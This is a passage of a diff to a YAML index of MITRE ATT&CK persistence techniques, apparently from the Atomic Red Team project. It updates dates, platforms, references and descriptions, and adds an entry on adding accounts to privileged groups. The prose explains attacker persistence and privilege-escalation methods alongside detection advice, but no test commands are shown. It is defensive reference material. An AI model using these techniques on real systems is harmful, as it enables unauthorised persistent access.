-          get hacked by a Chrome extension. Retrieved November 22, 2017.'
-        url: https://kjaer.io/extension-malware/
+          get hacked by a Chrome extension. Retrieved September 12, 2024.'
+        url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
       - source_name: Catch All Chrome Extension
         description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
           Steals All Posted Data. Retrieved November 16, 2017.
@@ -29845,71 +30211,139 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1176
     atomic_tests: []
   T1137.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:02:26.206Z'
+      name: Outlook Rules
+      description: |-
+        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Microsoft Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Application Log: Application Log Content'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
       created: '2019-11-07T20:00:25.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137.005
         url: https://attack.mitre.org/techniques/T1137/005
-      - source_name: SilentBreak Outlook Rules
-        url: https://silentbreaksecurity.com/malicious-outlook-rules/
-        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
-          February 4, 2019.
+        external_id: T1137.005
+      - source_name: Pfammatter - Hidden Inbox Rules
+        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
       - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
         description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
           Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
           4, 2019.
-      - source_name: Pfammatter - Hidden Inbox Rules
-        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
-        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
-          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SilentBreak Outlook Rules
+        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+          February 4, 2019.
+        url: https://silentbreaksecurity.com/malicious-outlook-rules/
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Outlook Rules
-      description: |-
-        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
-        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+        url: https://github.com/sensepost/notruler
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_detection: |-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Application Log: Application Log Content'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.011:
     technique:
@@ -29940,7 +30374,7 @@ persistence:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -29995,13 +30429,11 @@ persistence:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests: []
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -30062,9 +30494,9 @@ persistence:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -30073,7 +30505,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests: []
   T1037.002:
@@ -30126,7 +30557,7 @@ persistence:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -30147,12 +30578,11 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -30236,11 +30666,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -30253,7 +30682,6 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -30266,7 +30694,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -30296,7 +30723,8 @@ persistence:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests: []
   T1525:
@@ -30328,7 +30756,7 @@ persistence:
         url: https://github.com/RhinoSecurityLabs/ccat
         description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
           Retrieved September 12, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:27:49.094Z'
       name: Implant Internal Image
       description: |-
         Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -30350,8 +30778,6 @@ persistence:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.005:
     technique:
@@ -30377,7 +30803,7 @@ persistence:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -30403,36 +30829,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -30440,9 +30864,9 @@ persistence:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -30451,21 +30875,22 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -30505,13 +30930,10 @@ persistence:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -30588,12 +31010,11 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -30612,6 +31033,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -30619,7 +31041,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -30639,29 +31060,31 @@ persistence:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1505.003:
@@ -30738,12 +31161,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.003
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -30758,6 +31180,7 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -30766,18 +31189,18 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -30809,9 +31232,6 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1547.003:
@@ -30883,7 +31303,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests: []
   T1546.005:
@@ -30910,7 +31329,7 @@ persistence:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -30936,13 +31355,11 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -31063,7 +31480,6 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1136.001:
@@ -31135,7 +31551,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.001
     atomic_tests: []
   T1547.004:
@@ -31205,7 +31620,6 @@ persistence:
